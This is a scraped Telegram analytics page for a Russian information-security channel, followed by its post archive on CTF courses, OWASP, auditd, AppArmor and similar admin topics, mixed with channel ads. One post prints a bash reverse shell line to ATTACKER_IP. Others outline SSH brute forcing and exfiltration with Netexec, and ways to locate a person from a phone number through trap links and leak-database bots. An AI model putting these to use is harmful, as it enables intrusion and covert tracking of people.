CodeGuard: PySec Edition
关闭频道
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
显示更多📈 Telegram 频道 CodeGuard: PySec Edition 的分析概览
频道 CodeGuard: PySec Edition 是活跃参与者。目前社区聚集了 14 173 名订阅者,在 技术与应用 类别中位列第 8 752,并在 俄罗斯 地区排名第 45 689 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 14 173 名订阅者。
根据 28 九月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 820,过去 24 小时变化为 28,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 9.75%。内容发布后 24 小时内通常能获得 5.54% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 1 377 次浏览,首日通常累积 782 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 7。
- 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
凭借高频更新(最新数据采集于 29 九月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
14 173
订阅者
+2824 小时
+1467 天
+82030 天
帖子存档
14 173
🚩 Бесплатный базовый курс по CTF на Stepik
Если хотите познакомиться с самыми важными направлениями в CTF и инфобезе, этот курс — отличное стартовое решение. Включает 7 блоков и множество практических задач:
➡️Введение и работа с терминалом ➡️ Криптография ➡️ Сети ➡️ Стеганография ➡️ Разведка по открытым источникам (OSINT) ➡️ Компьютерная криминалистика ➡️ Обратная разработка📚 26 уроков, 42 минуты видео и 60 тестов — видно что делали, как могли)) Курс подходит студентам и всем, кто хочет освоить базовые навыки информационной безопасности и подготовиться к CTF-соревнованиям. ➡️ Курс по CTF на Stepik ⭐️ CodeGuard | #CTF #stepik #infosec #pentest
14 173
⭐️ Лучшие сервисы для проверки паролей на утечки в 2025 году:
Have I Been Pwned
Один из самых популярных и проверенных сервисов, собирает миллионы скомпрометированных записей. Можно проверить почту и пароль, получить уведомления о новых утечках.
How Secure Is My Password?
Быстрая проверка надежности пароля с рекомендациями по усилению.
SpyCloud Check Your Exposure
Анализ рисков для бизнеса, проверки наличия вредоносного ПО и скомпрометированных сессий.
LeakCheck
Инструмент для мониторинга и проверки утечек популярных данных.
Firefox Monitor
Бесплатный сервис от Mozilla с автоматическими уведомлениями.
GhostProject
Огромная база скомпрометированных аккаунтов с возможностью поиска по почте.
BreachAlarm
Проверка почты на утечки, автоматические оповещения, дополнительные сервисы для бизнес-пользователей.
💡 Рекомендуется регулярно проверять свои аккаунты на подобных сервисах и использовать сложные уникальные пароли, а также двухфакторную аутентификацию.
😈 CodeGuard
14 173
Программисты, это вам 👇
Держите 5 каналов, которые реально помогают изучать программирование и IT с полного нуля:
🖥 Easy Coder — все направления IT.
👩💻 Easy Python — всё о Python.
🌐 Easy WebDev — Frontend, Backend.
🔠 Easy InfoSec — ИБ, Хакинг.
🐱 Easy GitHub — лучшее с GitHub.
Тонны полезной инфы для любого уровня подготовки ✔️
14 173
💾 Rsync: подробное руководство для админов
Привет, участникам CodeGuard! В арсенале системного администратора и разработчика есть множество инструментов для переноса данных. Мы копируем файлы десятки раз в день: «cp» для локальных копий, «scp» для удалённых серверов. Но что если задача сложнее? Нужно не просто скопировать, а синхронизировать два дерева файлов, дёргая по сети лишь изменившиеся данные? Или поддерживать в актуальном состоянии зеркало веб‑контента?
Идея написать эту статью (а впоследствии и целую серию) родилась из многократного наблюдения одной и той же истории: многие знакомые годами используют «rsync» процентов на 10, даже не зная о возможностях, которые «прячутся» за его синтаксисом. А те, кто пытается погрузиться глубже, часто сталкиваются с отсутствием более‑менее полных руководств с примерами.
О чём эта статья? — Фундамент: как правильно путями в rsync и почему слеш в конце решает всё. — Три основных режима работы: локально, с сервером и между серверами. — Разбор «волшебного» флага -a: что скрывается под капотом. — Главные опции: как сделать вывод подробным, а работу — безопасной. — Синхронизация поверх SSH: работа с нестандартными портами. — Самые опасные «грабли» и как их избежать.😎Можно глянуть позже 😈 CodeGuard | #linux
14 173
❗️ OWASP Top 10 — самые опасные уязвимости веб-приложений и методы защиты
Список из десяти главных угроз, с которыми сталкиваются разработчики и специалисты по безопасности. Знать их — значит максимально защитить своё приложение.
Кратко по главному: 🔸Инъекции (SQL, XSS и пр.) — фильтруйте и используйте подготовленные запросы 🔸 Поломанная аутентификация — внедряйте многофакторную аутентификацию (MFA) 🔸 Разглашение данных — шифруйте и храните данные правильно 🔸 Нарушение контроля доступа — проверяйте права на стороне сервера 🔸 Небезопасная конфигурация — закройте ненужные порты и обновляйте ПО 🔸 Устаревшие компоненты — следите за обновлениями 🔸 Ошибки идентификации — ограничивайте попытки входа и применяйте MFA 🔸 Целостность ПО — проверяйте цифровые подписи и хэшируйте 🔸 Логирование и мониторинг — ведите логи и анализируйте их 🔸 SSRF — фильтруйте доступ к внутренним ресурсамПонимайте угрозы, применяйте защиту — и ваш софт станет крепким щитом против атак. ⭐️ Примеры и разбор здесь ⭐️ CodeGuard | #OWASP #WebSecurity
14 173
⭐️ Отслеживаем SSH-сессии и аудит команд в Linux с auditd и ausearch
Контроль за SSH-сессиями и выполнением команд — важная часть безопасности сервера. auditd — мощный демон аудита в Linux, а ausearch — удобный инструмент для анализа логов. Вместе они позволяют детально понимать, кто и что делал в системе.
🚀 Шаг 1. Установка auditd
В большинстве дистрибутивов auditd установлен по умолчанию. Если нет — ставим:
sudo apt-get install auditd
sudo systemctl start auditd
sudo systemctl enable auditd
⭐️ Шаг 2. Создаём правило аудита открытия SSH-сессий
Следим за запуском sshd и выполнением команд через системные вызовы:
sudo auditctl -a exit,always -F arch=b64 -S execve -F path=/usr/sbin/sshd -k ssh-session
И для 32-битных систем:
sudo auditctl -a exit,always -F arch=b32 -S execve -F path=/usr/sbin/sshd -k ssh-session
⚙️ Шаг 3. Аудит изменений важных файлов SSH
Например, контролируем изменения конфигурации sshd:
sudo auditctl -w /etc/ssh/sshd_config -p wa -k ssh-config
-w — путь к файлу
-p wa — наблюдать за записью и атрибутами
-k — тег для удобства поиска
📊Шаг 4. Просмотр и фильтрация логов с помощью ausearch
Ищем логи с тегом ssh-session:
sudo ausearch -k ssh-session -i
Опция -i форматирует вывод в читаемый вид.
Или события с изменениями конфигурации:
sudo ausearch -k ssh-config -i
🦜 Шаг 5. Можно искать записи за конкретное время:
sudo ausearch -k ssh-session --start today -i
💡Рекомендация:
- Для постоянных правил добавляйте их в /etc/audit/audit.rules или /etc/audit/rules.d/
- Используйте aureport для генерации сводных отчётов
- Помните о производительности — не ставьте правил слишком много
auditd с ausearch — это серьёзный инструмент для контроля всей активности по SSH и безопасности. Идеально подходит для расследования инцидентов и аудита пользователей.
😈 CodeGuard | #auditd #ausearch #SSH14 173
4 канала, которые делают из джуна сеньора
👩💻 IT Community:
— Новости и тренды IT
— Полезные ресурсы для разработчиков
— Бесплатные курсы от Microsoft, Google и яндекса
📱 Python:
— Roadmap Python-разработчика
— Django, Flask, FastAPI, парсинг и автоматизация
— Подборки задач для собеседований
📱 Frontend:
— HTML, CSS, JavaScript, React, Vue
— Советы по верстке и анимациям
— UI/UX фишки и полезные библиотеки
📱 Backend:
— Готовые проекты
— Как написать свой сайт за несколько минут
— Базы данных, Docker, микросервисы и тд
➡️ Сохраняйте, чтобы не потерять
14 173
💀 [Перевод] MalTerminal: первый вирус, который пишет сам себя с помощью ИИ
Представьте: хакеру больше не нужно сидеть ночами, вылизывая строчки кода для нового вируса. Достаточно открыть чат с ИИ и написать: «Сделай мне вредоносную программу, которая обойдёт защиту Windows 11 и зашифрует файлы» . Через минуту — готово. Звучит как фантастика? Увы, это уже реальность.
Исследователи из компании SentinelOne наткнулись на нечто по-настоящему пугающее — MalTerminal.
Это не просто очередной троян. Это впервые в истории , когда вредоносная программа полностью полагается на ИИ — в данном случае на GPT-4 от OpenAI — чтобы думать, адаптироваться и действовать. ИИ здесь — не помощник, а главный мозг операции. Он не просто подсказывает — он принимает решения.
🔹Это может быть полезно
😈 CodeGuard | #cybersecurity
14 173
🟢 Введение в сетевые технологии — всё про модели OSI, TCP/IP, устройства и протоколы
Если вы хотите понять, как устроена сеть, как данные текут по кабелям и настраиваются сервисы — это видео от профи именно для вас.
➡️ [Видеоурок: Введение в сетевые технологии
Что вы узнаете: ⚫️Как организована сеть — какие бывают устройства, от свитчей до маршрутизаторов ⚫️ Основы протоколов передачи данных — TCP, UDP, IP и другие ⚫️ Разбор сетевая модель OSI и TCP/IP — базовые уровни, их задачи и взаимодействие ⚫️ Инструменты анализа сетевой активности (Wireshark и другие) ⚫️ Фреймворки для пентеста и сетевые средства защитыЧто реально круто — объяснения простые, с практическими примерами. Обязательно посмотрите, если ищете фундаментальное понимание современных сетей! Для закрепления — домашка )) 😈 CodeGuard | #OSI #TCPIP #Wireshark
14 173
👩💻 Всем программистам посвящается!
Вот 17 авторских обучающих IT каналов по самым востребованным областям программирования:
Выбирай своё направление:
👩💻 Python — t.me/python_ready
🤔 InfoSec & Хакинг — t.me/hacking_ready
🖥 SQL & Базы Данных — t.me/sql_ready
🤖 Нейросети — t.me/neuro_ready
👩💻 C/C++ — https://t.me/cpp_ready
👩💻 C# & Unity — t.me/csharp_ready
👩💻 Java — t.me/java_ready
👩💻 Linux — t.me/linux_ready
🖼️ DevOps — t.me/devops_ready
📖 IT Книги — t.me/books_ready
👩💻 Frontend — t.me/frontend_ready
📱 JavaScript — t.me/javascript_ready
👩💻 Backend — t.me/backend_ready
📱 GitHub & Git — t.me/github_ready
👩💻 Весь IT — t.me/it_ready
👩💻 Bash & Shell — t.me/bash_ready
🖥 Design — t.me/design_ready
📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!
14 173
+3
🔐 Netexec для пентестеров: эксплуатация SSH
На Hacking Articles показали, как пентестеры используют Netexec для проверки безопасности SSH-серверов.
Основные возможности: Перебор паролей и учетных записей для обнаружения слабых логинов Проверка валидности найденных учетных данных Удаленное выполнение команд для разведки системы и окружения Передача файлов — заливка payload и сбор данных (эксфильтрация)Netexec интегрирован с MITRE ATT&CK, что позволяет моделировать реальные атаки с целью выявления уязвимостей, но при этом действия остаются контролируемыми и обратимыми. Основной риск — слабые пароли и плохо настроенные SSH сервисы, открывающие путь к полному компромиссу системы.
Рекомендуется: - Использовать ключевую аутентификацию вместо паролей - Внедрять многофакторную аутентификацию (MFA) - Ограничивать доступ по IP и логировать действия - Применять защиту от brute force (fail2ban, rate limiting)Руководство по эксплуатации SSH через Netexec поможет лучше понять риски и повысить безопасность ваших систем. 😈 CodeGuard | #security #pentest
14 173
💥 Часть 4 — Shell, которые используют плохие и хорошие парни
В мире кибербезопасности shell — это не просто оболочка, а инструмент контроля. Хорошие парни используют один набор, чтобы тестировать и обеспечивать безопасность, а плохие — нередко тот же, но в злонамеренных целях.
🔹Популярные shell в Kali Linux:
- Meterpreter — мощный шелл от Metasploit, который дает полный контроль над системой, позволяет выполнять команды и безопасно скрываться
- Netcat (nc) — универсальный «швейцарский нож» для создания обратных и привязанных соединений, часто используется для получения удаленного доступа
- Bash Reverse Shell — простой и легкий обратный шелл для быстрого доступа к целевой машине
- Powershell — удобен для работы с Windows-системами, часто применяется как в атаке, так и в защите
⚠️ Почему стоит знать и понимать их?
Понимание как работают эти оболочки поможет не только в атаках (при этичном хакинге), но и в обнаружении и нейтрализации вторжений в ваши сети.
🔍 Пример простого Bash reverse shell:
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
Этот код запускает обратное соединение с атакующим, позволяя контролировать машину через командную строку.
🖥 Часть 4 в Архиве — последний пост
⭐️ CodeGuard | Chat | #pentest #kali #course14 173
📧 Парсинг и анализ email-логов Postfix для выявления спама и фишинга
Postfix — надёжный почтовый сервер, но спам и фишинг — вечная головная боль. Логи Postfix — кладезь информации, где можно найти подозрительную активность, выявить проблемы с доставкой и защитить почтовую инфраструктуру. Разберёмся, как быстро парсить логи и выделять подозрительные письма.
🔍 Чего искать в логах то?
- Неудачные попытки доставки (`status=bounced`, `deferred`)
- Повторяющиеся попытки отправки — признак рассылки спама
- Подозрительные отправители и получатели
- Ошибки аутентификации и подключения
- Вирусы и фишинговые клиенты
🚀 Инструмент для парсинга:
— maillog — скрипт на Perl для группировки логов по письмам, выделение успешности и ошибок с цветами. Есть фильтры по дате, отправителю, получателю. Работает с ротацией логов и сжатыми файлами.
— Simple Postfix Log Analyzer — простой парсер на PHP с веб-интерфейсом для удобного анализа логов, сортировки и фильтров.
🟧 Быстрый пример парсинга с grep и awk:
grep 'postfix/' /var/log/mail.log | grep 'status=bounced'
Выведет все письма с ошибками доставки — часто это источник проблем.
⚙️ Автоматизация и хранение - Ежедневная обработка логов перед ротацией — сохраняйте нужную статистику в БД - Настройка оповещений на повторяющиеся ошибки - Анализ тем писем, IP отправителей и т.п. для выявления массированных атак➡️ Дальнейшее чтение — подробный разбор логов и генерация отчетов Парсинг логов — лучший способ следить за почтовой системой и быть на шаг впереди злоумышленников. 😈 CodeGuard | #Postfix #emailsecurity #bash
14 173
Он тимлид в российском бигтехе! Но ещё с универа мечтает о переезде в Лондон!
Он отправил уже несколько тысяч откликов на вакансии! Позади — сотни собеседований и столько же отказов 😳
Какое-то время он даже жил в лесу, чтобы ничего не отвлекало его от подготовки к интервью.
Он 14 лет в ИТ: писал сервисы, менеджерил команды, ломал монолиты и собирал новые 😅
Он видел всё — и даже то, чего не стоило бы видеть.
Весь свой опыт, знания и советы он публикует в своём канале, говорит простым и понятным языком.
Подпишись на его канал @artur_speaking
Узнай первым о том, что тебя ждёт впереди, чтобы оставить конкурентов далеко позади, добраться до самых вершин карьеры — и наказать своих врагов и завистников 💀
14 173
📍 Как узнать геолокацию человека по номеру телефона?
Мы разберём реальные способы определения местоположения человека. Помни, что напрямую по номеру телефона узнать точную локацию нельзя — это доступно только операторам и правоохранительным органам.
Вот готовый пост для Telegram на основе предоставленного материала:
Однако есть рабочие методы, которые можно использовать, комбинируя OSINT и социальную инженерию:
🔹 Поиск аккаунтов в соцсетях по номеру телефона — можно узнать город, увлечения, круг общения.
🔹 Отсылка ссылки-ловушки с просьбой поделиться местоположением (например, через проект Storm-Breaker).
🔹 Анализ фото с геометками в соцсетях для составления карты посещаемых мест.
🔹 Получение данных о точках доступа Wi-Fi и MAC-адресах для определения приблизительного района.
🔹 Использование Telegram-ботов (Userbox, Himera Search), работающих с базами утечек — они помогут найти адрес и другую информацию, но не текущее местоположение.
⚠️ Методы исключительно в статье для информации. Пользуйтесь легальными способами и уважайте приватность
😈 CodeGuard | #OSINT
14 173
Ой-ой-ой! Куда?! Кудаа??!
CodeGuard: Python — еще один новый канал?!
Ты хочешь прокачать навыки программирования на Python?
Тогда тебе точно сюда!
В нашем новом канале —
🔹Ежедневные разборы
🔹Полезные советы и трюки
🔹Практические примеры кода
🔹Поддержка и общение ⭐️
Подписывайся CodeGuard: Python
14 173
🛡 AppArmor и SELinux: базовое сравнение и настройка безопасности Linux
В системах Linux для повышения безопасности приложений применяют два основных механизма контроля доступа — AppArmor и SELinux. Оба помогают ограничивать права процессов, но делают это по-разному.
⭐️ Что выбрать?
AppArmor — основа на путях к файлам, проще в настройке и чтении, стандарт для Ubuntu и Debian.
SELinux — система с метками, более гибкая и комплексная, чаще используется в RHEL, CentOS и Fedora.
🔹Проверка статуса AppArmor:
sudo aa-status
Включение и запуск:
sudo systemctl enable --now apparmor
🔹 Основные команды AppArmor:
- Просмотр профилей:
sudo aa-status
- Перевод в режим жалоб (Complain) для отладки:
sudo aa-complain /path/to/profile
- Включение жесткого режима (Enforce):
sudo aa-enforce /path/to/profile
- Просмотр логов для диагностики:
journalctl -e | grep apparmor
🔹 Проверка статуса SELinux:
sestatus
Изменение режима (например, включение enforce):
sudo setenforce 1
Постоянное изменение в конфиге:
sudo nano /etc/selinux/config
# Измените SELINUX=enforcing
⚙️ Пример базового скрипта для включения AppArmor и SELinux:
#!/bin/bash
sudo systemctl enable --now apparmor
sudo aa-status
sudo setenforce 1
sestatus
✅ Практические советы:
- AppArmor проще и идеален для новичков или Ubuntu/Debian-систем.
- SELinux требует больше обучения, зато предлагает детальный контроль доступа.
- Для новых профилей используйте режим complain в AppArmor для отладки.
- Читайте логи для понимания блокируемых действий и настройки разрешений.
AppArmor и SELinux — ключевые инструменты для повышения защиты Linux, заставляющие процессы работать строго по правилам доступа. Начните с простого и развивайте навыки системной безопасности!
😈 CodeGuard | #AppArmor #SELinux #bash #security14 173
⚠️ JEA + PowerShell Remoting: Принцип минимальных привилегий в проде без боли
Сегодня мы поговорим о боли. О той самой боли, которая возникает в 3 часа ночи, когда звонит дежурный инженер и говорит, что «всё лежит». Веб-приложение не отвечает, а единственный способ что-то сделать — это дать ему RDP-доступ на сервер с правами локального, а то и доменного администратора. И всё это ради одной единственной задачи: перезапустить пул приложений в IIS.
Знакомая ситуация? Мы даем избыточные права, потому что это быстро и просто. Мы даем «ключ от всего города», чтобы человек мог открыть одну дверь. В этот момент мы открываем ящик Пандоры: случайная ошибка, запущенный по незнанию скрипт, а в худшем случае — скомпрометированная учетная запись, которая становится для злоумышленника плацдармом для захвата всей инфраструктуры.
Проблема в том, что традиционный подход к администрированию Windows-систем часто ставит нас перед ложным выбором: либо безопасность, либо операционная эффективность. Либо мы закручиваем гайки так, что никто не может работать, либо раздаем админские права направо и налево, надеясь на лучшее.
Но что, если я скажу вам, что этот выбор — ложный? Что существует технология, встроенная в Windows Server, которая позволяет нам совместить гранулярную безопасность, полный аудит и удобство автоматизации? Технология, которая превращает администрирование из «искусства» в точную инженерную дисциплину.
Имя ей — Just Enough Administration (JEA), и в связке с PowerShell Remoting она способна кардинально изменить ваш подход к управлению серверами.
Эта статья — не просто теоретический обзор. Это пошаговое, выстраданное на практике руководство по внедрению JEA в реальной продакшен-среде на Windows Server 2019/2022. Мы пройдем весь путь: от понимания фундаментальных принципов до создания, развертывания и использования защищенных конечных точек (endpoints), решая по пути реальные проблемы.📖 Читать дальше 😈 CodeGuard | #Windows #PowerShell #sysadmin
14 173
👩💻 Безопасность ядра Linux и эксплуатация уязвимостей: полный гид с ресурсами
Linux — это не просто ОС, а целый живой организм. Чтобы стать экспертом, нужно понимать слабые места и методы их обхода. Вот моя скромная подборка ресурсов, которые помогут прокачать знания в этой теме.
💀 Начните с книг и техник:
- Крупнейшая коллекция книг и материалов: [Books]
- Ключевые приёмы эксплуатации: [Techniques]
- Как эксплуатировать уязвимости: [Exploitation]
- Приёмы обхода защит: [Protection Bypasses]
👽 Уязвимости по полочкам:
- Утечки информации: [Info-leaks]
- Эскалация привилегий: [LPE]
- Удалённое выполнение кода: [RCE]
- Другие типы уязвимостей: [Other]
🔎 Как находить баги и защищать систему:
- Поиск багов: [Finding Bugs]
- Защитные методики: [Defensive]
- Практические эксплойты: [Exploits]
🛠 Инструменты для работы:
- Fuzzers и средства тестирования: [Fuzzers]
- Разное полезное: [Assorted]
👾 Практика и лаборатории:
- Воркшопы и курсы: [Workshops]
- Задачи для CTF: [CTF Tasks]
- Другие задания: [Other Tasks]
- Практические площадки: [Playgrounds]
- Инфраструктура для тестов: [Infrastructure]
⚙️ Погружение во внутренности ядра:
- [Первые шаги после декомпрессии ядра]
- [Обработка прерываний и исключений]
- [Подготовка к точке входа в ядро]
- [Точка входа в ядро]
- [Архитектурно-зависимая инициализация]
- [Продолжение архитектурно-зависимой инициализации]
- [Завершающие этапы setup_arch]
- [Инициализация RCU]
- [Конец инициализации]
🚀 Этого список — наработки для глубокого изучения и практики.
😈 CodeGuard | #LinuxKernel #pentesting #cybersecurity
